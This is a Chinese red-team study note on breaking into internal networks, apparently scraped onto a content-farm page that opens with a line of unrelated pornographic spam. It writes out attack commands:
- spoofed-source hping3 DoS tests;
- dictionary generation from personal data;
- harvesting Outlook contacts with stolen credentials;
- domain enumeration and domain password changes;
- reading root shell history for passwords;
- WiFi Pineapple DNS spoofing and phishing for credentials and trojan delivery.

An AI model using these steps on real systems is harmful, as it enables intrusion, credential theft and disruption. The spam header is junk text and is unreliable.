久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Notes Ninth Day-渗透攻击-红队-打入内网

發布時間:2023/12/20 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Notes Ninth Day-渗透攻击-红队-打入内网 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

**

Notes Ninth Day-滲透攻擊-紅隊-打入內網(dayu)

**

作者:大余
時間:2020-09-25

請注意:對于所有筆記中復現的這些終端或者服務器,都是自行搭建的環境進行滲透的。我將使用Kali Linux作為此次學習的攻擊者機器。這里使用的技術僅用于學習教育目的,如果列出的技術用于其他任何目標,我概不負責。

我必須再重申一遍:務必不要做未授權測試!不要未經授權在真實網絡環境中復現任何本書中描述的攻擊。即使是出于好奇而不是惡意,你仍然會因未授權測試行為而陷入很多麻煩。為了個人能更好的繼續學習發展,有很多漏洞獎勵計劃和靶場可以供你學習試驗,但是請記住,即使是參加漏洞獎勵計劃,私自測試范圍外的網站或對網站進行深入破壞也會讓你有大麻煩。

文章目錄

  • Notes Ninth Day-滲透攻擊-紅隊-打入內網(dayu)
  • 一、信息收集
    • 1、主機發現
    • nmap
    • Masscan
    • Nbtscan
    • hping3
    • 2、關聯信息生成
    • 字典生成:pydictor
    • 3、開放漏洞情報
    • 常用網站
    • Search Exploit一DB
    • 4、開源情報信息搜集(OSINT)
    • 搜索引擎語法
    • 在線接口
    • 相關工具
    • 5、Github Hacking
    • 搜索代碼
    • 搜索案例
    • 自動化工具
    • 6、google hacking
    • 7、Git-all-secret
    • 8、mailsniper.ps1獲取outlook所有聯系人
    • 9、內網滲透之信息收集
    • Windows(工作者和域)
    • Windows(域)
    • Linux
    • 10、后滲透信息收集之wmic命令的一些使用方法
    • wmic的簡單使用
    • 以進行為例展現wmic的使用
    • 關于powershell的Get-Wmi對象
    • 11、內網橫向常見端口
    • Port. 445
    • Port:137、138、139
  • 二、打入內網
    • 1、外部接入點-WiFi
    • 2.1.1 無線攻擊實戰應用之 DNSSpoof、Evil Portal、DWall
    • 2.1.2 防護意見
    • 2、應用系統漏洞利用
    • 2.2.1 常見漏洞掃描
    • 2.2.1.1 Nmap掃描漏洞技巧
    • 2.2.1.2 impacket框架之mssql服務器安全檢測
    • 2.2.1.3 MS17010py腳本利用
    • 2.2.2 未授權訪問漏洞
    • 2.2.2.1未授權漏洞總結
    • Redis
    • Jenkins
    • Mongodb
    • ZooKeeper
    • Elasticsearch
    • Memcache
    • Hadoop
    • Couchdb
    • Ldap
    • 2.2.2.2 JBOSS未授權訪問
    • 2.2.3 遠程代碼執行漏洞
    • 2.2.3.1 Java下奇怪的命令執行
    • 2.2.3.2 Shiro反序列化記錄
    • 2.2.3.3 RMI-反序列化
    • 2.2.3.4 JNDI注入
    • 2.2.3.5 fastjson漏洞淺析
    • 2.2.3.6 CVE-2019-11043 PHP遠程代碼執行復現
    • 2.2.3.7 java webshell從入門到入獄系列1-基礎篇
    • 2.2.3.8 深究XMLdecoder (dayu-Third day)
    • 2.2.3.9 FastJson 反序列化學習
    • 2.2.3.10 Oracle 數據庫安全思考之xml反序列化
    • 2.2.3.11 Webshell繞安全模式執行命令
    • 2.2.3.12 Java 下的XEE漏洞
    • 2.2.3.13 Solr Velocity模板遠程代碼復現及利用指南
    • 2.2.3.14 Solr-RCE-via-Velocity-template
    • 2.2.3.15 java webshell 從入門到入獄系列2-攻防對抗之Bypass-上篇
    • 2.2.3.16 java webshell 從入門到入獄系列3-攻防對抗之Bypass-中篇
    • 2.2.3.17 java webshell 從入門到入獄系列4-攻防對抗之Bypass-下篇
    • 2.2.3.18 Java反序列化過程深究(dayu-fourth day)
    • 2.2.3.19 Apache Slor不安全配置遠程代碼執行漏洞復現及jmx rmi利用分析
    • 2.2.3.20 java命令執行小細節
    • 2.2.3.21 JDK反序列化Gadgets-7u21
    • 2.2.3.22 Weblogic-T3-CVE-2019-2890-Analysis
    • 2.2.3.23 spring-boot-actuators未授權漏洞
    • 2.2.3.24 SEMCMS2.6后臺文件上傳漏洞審計
    • 2.2.3.25 代碼審計之lvyecms后臺getshell
    • 2.2.3.26 Log4j-Unserialize-Analysis
    • 2.2.3.27 JAVA反序列化- FastJson組件
    • 2.2.3.28 Spring-securiy-oauth2 (CVE-2018-1260)
    • 2.2.4 WAF-bypass(dayu-Fifth day)
    • 找真實IP,繞過CDN
    • https降級繞過
    • ssl問題繞過
    • method 繞過
    • Heard IP 繞過
    • XSS
    • SQL
    • Mysql
    • 命令執行
    • 文件上傳繞過
    • 解析漏洞
    • PHP CGI 解析漏洞
    • 系統特性:利用NTFS ADS特性
    • 協議解析不一致,繞過waf(注入跨站也可嘗試)
    • 文件類型繞過/Header 頭類型
    • 未解析所有文件
    • 不規則Content-Disposition文件名覆蓋
    • boundary 繞過
    • 文件名覆蓋繞過
    • 遺漏文件名
    • 其他類型繞過
    • HPP HTTP參數污染/拼接繞過
    • HPF HTTP分割注繞過
    • 最后另類繞過合集
    • 2.2.5 登錄口JS前端加密繞過
    • jsEncrypter安裝與本地測試 (dayu-Sixth day)
    • 2.2.6 XMLDecoder 標簽、POC
    • 2.2.7 phpMyAdmin去getshell
    • 2.2.8 攻擊JWT的一些方法
    • 2.2.9 上傳漏洞
    • 上傳技巧
    • 上傳的思路
    • KindEditor
    • 2.2.9.1 上傳漏洞總結
    • 概要說明
    • 服務端的上傳驗證
    • 上傳繞過姿勢
    • 文件擴展名繞過(asp、aspx、php、jsp)
    • Content-Disposition、content-type、文件內容檢測、雙文件
    • 客戶端檢測(JavaScript檢測)(dayu-Seventh day)
    • WAF繞過(阿里云、安全狗、百度云、云鎖)
    • 實戰分析
    • upload-labs過關
    • 造洞
    • 2.2.10 注入漏洞
    • MSSQL注入
    • MYSQL注入
    • 盲注
    • Sqlmap
    • 2.2.10.1 MSSQL利用總結(dayu-Eighth day)
    • 命令執行
    • 注冊表
    • 持久化
    • 文件操作
    • 信息獲取
    • 2.2.10.2 攻擊MSSQL--PowerUpSQL 介紹
    • 發現MSSQL實例
    • 獲取MSSQL信息
    • 測試口令
    • 持久性
    • 獲取域信息
    • 防御方案
    • 2.2.10.3 如何利用Mysql安全特性發現漏洞
    • Mysql權限
    • load_file函數用法
    • Mysql版本差異
    • 成功利用實例
    • 腦洞大開
    • 2.2.10.4 Hibernate基本注入
    • 2.2.10.5 mysql 利用general_log_file、slow_query_log_file寫文件
    • 2.2.10.6 SQL Server注入 Getshell 有趣案例
    • 2.2.11 文件讀取漏洞
    • 2.2.12 Pentesterlab Xss
    • 2.2.13 Office宏的基本利用
    • 2.2.14 Java-security-calendar-2019-Candy-Cane
    • 2.2.15 Discuz Ssrf Rce漏洞分析報告
    • 2.2.16 WordPress語言文件代碼執行漏洞分析
    • 2.2.17 Struts2遠程命令執行s2-048漏洞分析報告
    • 2.2.18 靜態免殺php一句話(已過D盾,河馬,安全狗)
    • 2.2.19 金融信息系統安全測評方法(不公布!)
    • 2.2.20 Apache-Poi-XXE-Analysis
    • CVE-2014-3529
    • CVE-2019-12415
    • 2.2.20 記一次阿里主站xss測試及繞過waf防護
    • 2.2.21 ClassLoader類加載機制
    • 2.2.22 淺談SSRF原理及其利用(dayu-Ninth Day)
    • 2.2.23 Spring-Data-Commons (CVE-2018-1273)
    • 2.2.24 xss繞過代碼后端長度限制的方法
    • 2.2.25 mysql提權之mof
    • 2.2.26 mysql提權之udf
    • 2.2.27 XSS 基礎學習
    • 2.2.28 java 反射與內存shell 初探-基于jetty容器的shell 維權


一、信息收集

1、主機發現

nmap

官網: https://nmap.org/
安裝系統及命令:
Mac os: brew install nmap
Centos: yum install nmap
Ubuntu: apt一get install nmap

參考手冊: https://nmap.org/man/zh/index.html

掃描方式
常見的七種掃描方式:
ТСР: -sT
SYN: -sS
ACK: -sA
UDP: -sU
RPC: -sR
ICMP: -sP
Disable Port Scan: -sn
最常見的這些參數解釋:https://blog.csdn.net/liudongdong19/article/details/83506731

常見掃描案例
掃描10000端口、操作系統、版本

nmap -T4 -A <target>

版本探測

nmap -sV <target>

操作系統

nmap -O <target>

其他常用技巧:

--host-timeout 主機超時時間 通常選值:18000 --scan-delay 報文時間間隔 通常選值:1000 -s <源地址> 定義掃描源地址,為了不被發現

示例
nmap -V -iR 100000 -PO -p 80
隨機選擇100000臺主機掃描是否運行Web服務器(80端口)。由起始階段發送探測報文來確定主機是否工作非常浪費時間,而且只需探測主機的一個端口,因此使用-PO禁止對主機列表。

host -l company.com | cut -d -f 4 | nmap -V -iL -

進行DNS區域傳輸,以發現company.com中的主機,然后將IP地址提供給Nmap。上述命令用于GNU/Linux —— 其它系統進行區域傳輸時有不同的命令。

輸出

-oN <File> -oX <XML File> -oG <filespec> 參考:http://www.unspecific.com/nmap-oG-output/

Masscan

項目地址: https://github .com/robertdavidgraham/masscan
安裝:
$ sudo apt-get install git gcc make libpcap一dev
$ git clone https://github. com/ rober tdavidgr aham/ masscan
$ cd masscan
$ make

該工具兼容Nmap的參數高級選項

高級選項

命令:sudo masscan --ports 1-10000 192.168.1.4 --adapter-ip 192.168.175.128

-adapter-ip 指定發包的IP地址 -adapter-port 指定發包的源端口 -adapter-mac 指定發包的源MAC地址 -router-mac 指定網關的MAC地址 -exclude IP地址范圍黑名單,防止masscan掃描 -excludefile 指定IP地址范圍黑名單文件 -includefile,-iL 讀取一個范圍列表進行掃描 -wait 指定發送完包之后的等待時間,默認為10秒


命令:masscan -e eth0 -p 1-65535 --rate 1000 192.168.1.4
在網絡環境慢的情況下,快速掃描出存在端口與nmap配合


Nbtscan


kali系統自帶nbtscan,以及查看幫助說明

nbtscan掃描可以發現主機名、MAC addr等信息…

nbtscan -r 192.168.1.0/24

掃描整個C段

nbtscan 192.168.1.1-100

掃描一個范圍

nbtscan -v -s : 192.168.1.0/24

以:分割顯示結果

nbtscan -f <File>

從文件讀取掃描范圍

高級用法

nbtscan -v -s ' ' 192.168.1.4 nbtscan -v -s ' ' 192.168.1.4 | awk '{print $1}' | uniq

hping3

hping3主要測試防火墻的攔截規則,對網絡設備進行測試
常用模式

常用模式 -0 -rawip IP原始報文 -1 -icmp ICMP模式 -2 -udp UDP模式 -8 -scan 掃描模式 -9 -listen 監聽模式 hping3 --scan 1-30,70-90 -S www.baidu.com

SYN方式掃描主機端口

sudo hping3 --scan 445,135 -S 192.168.1.4

可以看到,目標主機回復了: S…A,代表SYN/ACK

hping3 -S -a 114.114.114.114 -p 53 114.114.114.114 -c 5

測試防火墻對ICMP包的反應、是否支持traceroute、是否開放某個端口、對防火墻進行拒絕服務攻擊(DoS attack)。例如,以LandAttack方式測試目標防火墻(Land Attack是將發送源地址設置為與目標地址相同,誘使目標機與自己不停地建立連接)

DRDDOS

hping3 -udp -a 114.114.114.114 -p 53 114.114.114.114 -c 5

基于UDP的DOS

參考

http://0daysecurity.com/articles/hping3_ examples.html --很詳細用法的解釋 http://man.linuxde.net/hping3

2、關聯信息生成

在滲透前期工作開展之前,需要對目標的各種信息進行分析、拆分、組合
例如:赫爾巴斯亞基國
根據地域習慣、宗教、互聯網開放信息等信息進行簡要拆分,假設獲取的信息如下:

當地人愛好吃橙子 當地人信奉伊斯蘭教 IPV4地址開放IP段 相關社交網絡公 開的數據庫

根據宗教、習慣、IP地址、 開放數據支持…等,為后續的字典生成、魚叉、水坑攻擊鋪下基石

字典生成:pydictor

安裝:

git clone https://github.com/LandGrey/pydictor

生成字典

命令:python pydictor.py --sedb

常見的命令:

python pydictor.py --sedb set cname liwei set sname lw Lwei set ename zwell set birth 19880916 set usedpwd liwei123456. liwei@19880916 lw19880916_123 set phone 18852006666 set uphone 15500998080 set hphone 76500100 61599000 01061599000 set email 33125500@qq.com set email 13561207878@163.com set email weiweili@gmail.com set email wei010wei@hotmail.com set postcode 663321 962210 set nickname zlili set idcard 152726198809160571 set jobnum 20051230 100563 set otherdate 19591004 19621012 set otherdate 19870906 19880208 set usedchar tiger gof gamesthrones 176003 m0n5ter ppdog

常用的組合命令:
合并去重

python pydictor.py -tool uniqbiner /my/all/dict/

多字典文件組合工具

python pydictor.py -tool hybrider heads.txt some_others.txt tails.txt

參考詳細:https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md


3、開放漏洞情報

常用網站

CVE:https://cve.mitre.org/ Exploit-DB:https://www.exploit-db.com/ CX Security:https://cxsecurity.com/ CNVD:https://www.cnvd.org.cn/ securitytracker:https://www.securitytracker.com/

**

Search Exploit一DB

**

利用searchsploit apache 5.3.12搜索apache漏洞…這很熟悉了…

命令:searchsploit -u
更新最新exp庫…


4、開源情報信息搜集(OSINT)

搜索引擎語法

百度:https://www.baidu.com 谷歌:https://www.google.com 必應:https://cn.bing.com

在線接口

http://ce.baidu.com/index/getrelatedsites?site_address=baidu.com http://www.webscan.cc/ http://sbd.ximcx.cn/ --在線子域名查詢-接口光速版 https://censys.io/certificates?q=.example.com https://crt.sh/?q=%25.example.com https://github.com/c0ny1/workscripts/tree/master/get-subdomain-from-baidu https://dnsdumpster.com/ --查詢DNS記錄、偵查、研究 https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=baidu.com --和第一個一樣 https://findsubdomains.com/ https://dnslytics.com/search?g=www.baidu.com --DNSlyrics https://pentest-tools.com/information-gathering/find-subdomains-of-domain --DNS攻擊面2次免費 https://viewdns.info/ --功能很多 https://www.ipneighbour.com/#/lookup/114.114.114.114 --鄰居發現 https://securitytrails.com/list/apex_domain/baidu.com https://url.fht.im/ http://api.hackertarget.com/hostsearch/?q=baidu.com http://www.yunsee.cn/finger.html --云悉(限制挺大)

有幾個挺好用的,自行挖掘…

相關工具

https://github.com/rshipp/awesome-malware-analysis/blob/master/惡意軟件分析大合集.md

此網站極力推薦學習!!!


5、Github Hacking

您可以在所有公共GitHub存儲庫中搜索以下類型的信息,以及您有權訪問的所有私有Github存儲庫

Repositories Topics Issues and pull requests Code Commits Users Wikis

參考 :

Searching for repositories Searching topics Searching code Searching commits Searching issues and pull requests Searching users Searching wikis Searching in forks

可以使用以上方式搜索頁面或高級搜索頁面搜索Github
您可以使用>,>=,<,和<搜索是大于,大于或等于,小于和小于或等于另一個值的值
下面會介紹如何搜索

搜索倉庫

>_n cats stars:>1000匹配關鍵字"cats"且star大于1000的倉庫 >=_n_ cats topIcs:>=5匹配關鍵字"cats"且標簽數量大于等于5的倉庫 <_n_ cats size:<10000匹配關鍵字"cats"且文件小于10KB的倉庫 <=_n_ cats stars:<=50匹配關鍵字"cats"且star小于等于50的倉庫 _n_..* cats stars:10..*匹配關鍵字"cats"且star大于等于10的倉庫 *.._n_ cats stars:*..10匹配關鍵字"cats"且star小于等于10的倉庫 n..n cats stars:10..50匹配關鍵字"cats"且star大于10且小于50的倉庫

搜索代碼

注意事項

只能搜索小于384KB的文件 只能搜索少于500,000個文件的存儲庫,登錄的用戶可以搜索所有公共存儲庫 除filename搜索外,搜索源代碼時必須至少包含一個搜索詞。例如,搜索language: Javascript無效,而是這樣: amazing language:Javascript 搜索結果最多可以顯示來自同一文件的兩個片段,但文件中可能會有更多結果。您不能將以下通配符用作搜索查詢的一部分“.、! " = * ! ? # $ & + ^ | ~ < > ( ) { } [ ] 搜索將忽略這些符號

日期條件

cats pushed:<2012-07-05 搜索在2012年07月05日前push代碼,且cats作為關鍵字 cats pushed:2016-04-30..2016-07-04 日期區間 cats created:>=2017-04-01 創建時間

邏輯運算

AND、OR、NOT

排除運算

cats pushed:<2012-07-05 language:java 搜索在2012年07月05日前push代碼,且cats作為關鍵字,排除java語言倉庫

包含搜索

cats in:file 搜索文件中包含cats的代碼 cats in:path 搜索路徑中包含cats的代碼 cats in:path,file 搜索路徑、文件中包含cats的代碼 console path:app/public language:javascript 搜索關鍵字 console,且語言為javascript,在app/public下的代碼

主體搜索

user: USERNAME 用戶名搜索 org: ''ORGNAME 組織搜索 repo: USERNAME/REPOSITORY 指定倉庫搜索

文件大小

size:>1000 搜索大小大于1KB的文件

搜索案例

filename:config.php language:php 搜索文件名為 config.php,且語言為php的代碼

搜索Java項目配置文件: mail filename:.properties

搜索extension:yaml mongolab.com 中存在的代碼信息等

自動化工具

https://github.com/unkl4b/gitmIner


example使用即可,非常好用

https://github.com/techgaun/github-dorks 詳細介紹github hacking 搜索利用代碼以及方法!!

6、google hacking


用法

Intitle 包含標題 Intext 包含內容 filetype 文件類型 Info 基本信息 site 指定網站 inurl 包含某個url link 包含指定鏈接的網頁 cache 顯示頁面的緩存版本 numberange 搜索一個數字

示例
搜索目標包含后臺的頁面

命令:inurl:/admin intext: 后臺管理系統

site:"some-keywords.com"intitle: login intext: intext: 管理|后臺|登陸|用戶名|密碼|驗證碼|系統|帳號| manage|admin|login|system

搜索目標是否有目錄列表


可看到存在目錄列表很多url
命令:intext: index of / | ../ | Parent Directory

site:"some-keywords.com" intext: index of / | ../ | Parent Directory

7、Git-all-secret

特性

可以添加自己的正則表達式,在 docker run的時候使用-V

(pwd)/ rules. json; /root/truffleHog/rules. json??梢允褂媚J正則表達式,如果需要,也可以用truffleHog提供的高熵字符串。可以通過repo- supervisor工具搜索s和json中的高熵字符串。可以搜索用戶的Gist,大多數工具都沒這個功能。有新工具可以很容易地集成到 git-all-secrets。支持掃描企業 Github orgs/ users/repos/ gists。大多數工具只掃描單個倉庫,gtal- secrets可以一次掃描多個…

需要在docker環境下安裝,我跳過了這個,以后有精力查看!


8、mailsniper.ps1獲取outlook所有聯系人

條件

掌握其中一個用戶郵箱的賬號密碼,并且可以登錄outlook
outlook地址可以是官方的也可以是目標自己搭建的,并無影響

目的

獲取目標郵箱里的所有聯系人,方便后續爆破弱口令等等

利用

將嘗試 Outlook Web Access(OWA)和Exchange Web服務(EWS)的方法。此命令可用于從Exchange收集電子郵件列表 :

Get-GlobalAddressList -ExchHostname "outlook地址” -UserName “域名/域用戶名” -Password “密碼” -OutFile global-address-list.txt

可以自己搭建目標outlook在自己服務器上

此處使用kion的域環境模擬
在mailsniper. ps1最后一行加入以下代碼,也可以通過傳參的形式調用

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt

嘗試使用我們傳遞的賬號密碼去登錄目標的outlook,成功登錄后會把郵件里的聯系人都獲取下來,并輸出保存到文件里

如果outlook在Office365上道理也是一樣的,把ExchHostname指向outlook.office365.com即可,username使用完整的郵箱不要是用戶名即可

Get-GlobalAddressList -ExchHostname outlook.office365.com -Username 用戶名@郵箱.....

參考鏈接

https://www.blackhillsinfosec.com/abusing-exchange-mailbox-permissions-mailsniper/ https://www.cnblogs.com/backlion/p/6812690.html

工具地址

https://github.com/dafthack/mailsniper

9、內網滲透之信息收集

Windows(工作者和域)

檢查當前shell權限

whoami /user & whoami /priv


查看系統信息

systeminfo


收集信息主機名->扮演角色

Tcp/udp 網絡連接狀態信息

netstat -ano

可以獲取內網IP分布狀態-服務(redis)

查看機器名

hostname

查看當前操作系統

wmic OS get Caption,CSDVersion,OSArchitecture,Version ver


查殺軟

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List


查看當前安裝的程序

wmic product get name,version


查看在線用戶

quser windwos7命令 net config workstation windwos10命令/查看當前域


查看網絡配置

ipconfig /all


有 Primary Dns Suff就說明是域內空的則當前機器應該在工作組

查看進程

tasklist /v


有些進程可能是域用戶啟的->通過管理員權限憑證竊取->竊取域用戶的憑證

查看當前登陸域

net config workstation


遠程桌面鏈接歷史記錄

cmdkey /l


可以把憑證取下來->本地密碼

查看本機上的用戶賬戶列表

net user


查看本機用戶xxx的信息

net user xxx


查看本機用戶xxx的信息

net user /domain 顯示所在域的用戶名單 net user 域用戶 /domain 獲取某個域用戶的詳細信息 net user /domain xxx 12345678 修改域用戶密碼,需要域管理員權限

Windows(域)

nltest /domain_trusts /all_trusts /v /server: 192.168.xx.xx 返回所有信任域列表 nltest /dsgetdc:hack /server:192.168.xx.xx 返回域控和其相應的IP地 net user /do 獲取域用戶列表 net group "domain admins" /domain 獲取域管理員列表 net group "domain controllers" /domain 查看域控制器(如果有多臺) net group "domain computers" /domain 查看域機器 net group /domain 查詢域里面的工作組 net localgroup administrators 本機管理員[通常含有域用戶] net localgroup administrators /domain 登錄本機的域管理員 net localgroup administrators workgroup\user001 /add 域用戶添加到本機 net view 查看同一域內機器列表 net view \\ip 查看某IP共享 net view \\GHQ 查看GHQ計算機的共享資源列表 net view /domain 查看內網存在多少個域 net view /domain:XYZ 查看XYZ域中的機器列表 net accounts /domain 查詢域用戶密碼過期等信息

Linux

查看當前權限

whoami

查看網卡配置

ifconfig

查看端口狀態(開啟了哪些服務,內網IP連接等

netstat -anpt

查看進程狀態(開啟了哪些服務等)

ps -ef

查看管理員的歷史輸入命令(獲取密碼,網站目錄,內網資產等信息)

cat /root/.bash_history

查找某個文件(尋找配置文件等)

find / -name *.cfg

10、后滲透信息收集之wmic命令的一些使用方法

前言

wmic和cmd一樣在所有的windows版本中都存在,同時wmic有很多cmd下不方便使用的部分,今天給大家介紹一些在后滲透過程中非常適用的使用wmic進行信息收集的命令

關于wmic

WMI命令行(WMIC)實用程序為WMI提供了命令行界面。WMIC與現有的Shell和實用程序命令兼容。在WMIC出現之前,如果要管理WMI系統,必須使用一些專門的WMI應用,例如SMS,或者使用WMI的腳本編程API,或者使用象CIM Studio之類的工具。如果不熟悉C++之類的編程語言或VBScript之類的腳本語言,或者不掌握WMI名稱空間的基本知識,要用WMI管理系統是很困難的,WMIC改變了這種情況

wmic的簡單使用

首先在cmd命令行輸入wmic進入交互式頁面,這里說一下在powershell也可以和cmd命令行一樣的操作

進入wmic和powershell模式下

/? 查看WMIC命令的全局選項以及命令屬性等 process /? 進程管理的幫助

wmic process get /? 屬性獲取操作幫助

根據實際的需要去對相關的信息進行讀取


以進行為例展現wmic的使用

這里的靶機是win7 x86的虛擬機,這里以查看進程為例:

wmic process get caption,executablepath,processid

獲取系統當前正在運行的進程等信息

wmic service where (state="running") get name ,processid ,pathname ,startmode ,caption


查看服務進程詳細信息

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe


查看安裝的殺軟進程運行情況

wmic onboarddevice get Description, DeviceType, Enabled, Status /format:list


查看存在狀態

wmic product get name

系統安裝軟件情況

wmic environment get Description, VariableValue


系統環境變量

wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles/format:list

wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

關于更多的信息可以通過官方的說明文檔

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

關于powershell的Get-Wmi對象

Get-Wmi是獲取Windows Management Instrumentation(WMI)類的實例或有關可用類的信息。我們需要首先知道自己的 windows計算機支持那些可用的WMI類

Get-Wmiobject -list 自己的windows計算機支持那些可用的WMI類

get-wmiobject get-wmiobject -class win32_process

在本地計算機上獲取進程

具體的參數以及命令在官方文檔中進行查詢:

https://docs.microsoft.com/zh-cn/powershell/module/Microsoft.PowerShell.Management/Get-WmiObject?view=powershell-5.l#parameters

很棒的powershell官方命令

11、內網橫向常見端口

Port. 445

SMB( Server Message Block) Windows協議族,主要功能為文件打印共享服務,簡單來講就是共享文件夾

該端口也是近年來內網橫向擴展中比較火的端口,大名鼎鼎的永恒之藍漏洞就是利用該端口,操作為掃描其是否存在MS17-010漏洞。正常情況下,其命令主要是建立IPC服務中

空會話

net use \\192.168.1.x

遠程本地認證

net use \\192.168.1.2 /user:a\username password

注:a/username 中 a 為工作組情況下的機器命名,可以為任意字符,例如workgroup/username

域 test.local 遠程認證

net use \\192.168.1.2 /user:test\username password

Port:137、138、139

NetBios端口,137、138為UDP端口,主要用于內網傳輸文件,而NetBios/SMB服務的獲取主要是通過139端口

Port: 135

該端口主要使用DCOM和RPC(Remote Procedure Call)服務,我們利用這個端口主要做WMI(Windows Management Instrumentation)管理工具的遠程操作

使用時需要開啟wmic服務 幾乎所有的命令都是管理員權限 如果出現 "Invalid Globa| Switch",需要使用雙引號把該加的地方都加上 遠程系統的本地安全策略的“網絡訪問:本地帳戶的共享和安全模式"應設為“經典-本地用戶以自己的身份驗證" 防火墻最好是關閉狀態

該端口還可以驗證是否開啟 Exchange Servert


Port: 53

該端口為DNS服務端口,只要提供域名解析服務使用,該端口在滲透過程中可以尋找一下DNS域傳送漏洞,在內網中可以使用DNS協議進行通信傳輸,隱蔽性更加好
參考文章

dns隧道之dns2tcp

https://blog.csdn.net/gsls200808/article/details/50318947 https://blog.csdn.net/deng_xj/article/details/88834124

dns隧道之unseat2

https://www.cnblogs.com/bonelee/p/7927706.html https://blog.csdn.net/ddr12231/article/details/102306989

Port: 389

用于LADP(輕量級目錄訪問協議),屬于TCP/IP協議,在域過程中一般出現在域控上出現該端口,進行權限認證服務,如果擁有對該域的用戶,且擔心net或者其他爆破方法不可行的情況,可以嘗試使用LADP端口進行爆破

工具可以使用類似于hydra等開源項目


Port: 88

該端口主要開啟Kerberos服務,屬于TCP/IP協議,主要任務是監聽KDC的票據請求,該協議在滲透過程中可以進行黃金票據和白銀票據的偽造,以橫向擴展某些服務


Port: 5985

該端口主要介紹WinRM服務,WinRM是Windows對WS-Management的實現,WinRM允許遠程用戶使用工具和腳本對Windows服務器進行管理并獲取數據。并且WinRM服務自Windows Vista開始成為Windows的默認組件

條件:

Windows Vista上必須手動啟動,而Windows Server 2008 中服務是默認開啟的 服務在后臺開啟,但是端口還沒有開啟監聽,所以需要開啟端口 使用 winrm quickconfig 對winRM進行配置,開啟HTTP和HTTPSS監聽,且需要開啟防火墻

二、打入內網

1、外部接入點-WiFi

2.1.1 無線攻擊實戰應用之 DNSSpoof、Evil Portal、DWall

組合拳入侵(配合)

前言:主要向大家介紹 WiFi Pineapple(以下簡稱“菠蘿”)設備的基本使用方法,以及通過菠蘿中的幾個模塊達到中間人攻擊,網站釣魚和獲得shell。文章中主要使用到DWall、Evil Portal與DNSMasq Spoofv三個模塊

Pineapple開啟與網絡橋接將菠蘿的按鈕由off劃到wifi標志,稍等片刻便會向周圍發射兩個無線信號。一個無線信號是菠蘿的管理ap,一個是給受害者使用的開放ap。這兩個ap的ssid以及管理ap的密碼均可以在菠蘿的web管理界面中設置

http://www.wifipi.org:8080/WiFiPineapple-%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C-V1.3.pdf https://shop.hak5.org/products/wifi-pineapple

參考該資料以及購買菠蘿設備連接!
簡單總結一下利用模塊解釋:

Evil Portal

可以利用Evil Portal模塊獲取TP-LINK管理員密碼,它的作用是可以使接入用戶在訪問任意網站時都跳轉到我們事先設置好的 Landing page中。 Landing Page是設置菠蘿網關的頁面,此處我們重定向到公網上一臺配置好釣魚網站的vps上,也可給菠蘿添加一張sd卡,直接將釣魚網站文件放置到菠蘿中

Dwall

使用DWall進行中間人攻擊DWall中文名稱叫"綿羊墻",是菠蘿中的一個默認安裝模塊,它可以嗅探已連接客戶端的所有HTTP請求,如URLS、Cookies、Post Data,以及實時地顯示出客戶端正在瀏覽的圖片等

DNSSpoof

此處使用到菠蘿中的 DNSMasq spoc模塊。它的作用是dns劫持,獲取到受害客戶端的域名解析控制權。我們可以在hosts中設置想要進行欺騙的域名,當用戶輸入該域名后,模塊會欺騙用戶將域名解析成設置好的IP,此處我們設置跳轉到菠蘿網關上

DNSSpoof模塊可以嘗試獲取shell,可以嘗試使受害者重定向到一臺公網上的vps來下載木馬文件,誘導受害者點擊。木馬文件可精心構造,比如具有欺騙性的文件名,免殺木馬等。

DNS欺騙原理

DNS服務器工作原理是,存儲IP地址到DNS名稱映射的記錄(稱為資源記錄)數據庫,聯系這些資源記錄與客戶端,并將這些資源記錄與其他DNS服務器聯系。而客戶端對于每個通過互聯網發送的DNS請求都包含一個獨特的識別碼,其目的在于辨識查詢和響應,并將對應的查詢和響應配對在起。這就意味著,如果我們可以攔截客戶端發送的DNS請求包,做一個包含該識別碼的假數據包,這樣目標計算機就會根據識別碼認為這個假數據包就是其需要的結果,從而接受我們發送的包。這里嘗試使用nslookup查看域名解析情況,用tracert命令跟蹤:無修改,dns欺騙,配置靜態dns,三種情況下訪問測試域名的路由情況

2.1.2 防護意見

配置靜態可靠的dns 將訪問的重要域名與P地址進行綁定 提高安全意識,不輕易連接不可信的、開放的無線熱點

2、應用系統漏洞利用

2.2.1 常見漏洞掃描

2.2.1.1 Nmap掃描漏洞技巧

auth 處理身份驗證 broadcast 網絡廣播 brute 暴力猜解 default 默認 discovery 服務發現 dos 拒絕服務 exploit 漏洞利用 external 外部擴展 fuzzer 模糊測試 intrusive 掃描可能造成不良后果 malware 檢測后門 safe 掃描危害較小 version 版本識別 vuln 漏洞檢測

通用參數 -vuln

nmap --script=vuln 192.168.175.138


這兒是我自己搭建的win7虛機掃描的結果,存在兩個高??衫寐┒辞闆r

MS17-010

map --script=smb-vuln-ms17-010 192.168.175.138


2.2.1.2 impacket框架之mssql服務器安全檢測

在實際滲透測試工作中經常會遇到檢測項目中mssq服務器安全性,此篇文章介紹 impack框架中 mssqlclient的使用方法。

mssqlclient與其他工具相比的優勢

跨平臺,python腳本編寫,并且已有exe版本 命令行執行,速度快 支持使用 socks代理傳輸數據 支持以hash傳遞的方式進行賬號驗證 支持 windows認證模式進行mssq服務的安全檢測 執行sq命令可以是交互式,也可以直接回顯sq命令執行結果

win和linux環境下使用
1)在windows環境下使用windows認證模式,mssqlclient測試登陸sqlserver服務器,賬號驗證通過后會直接返回 sql shell

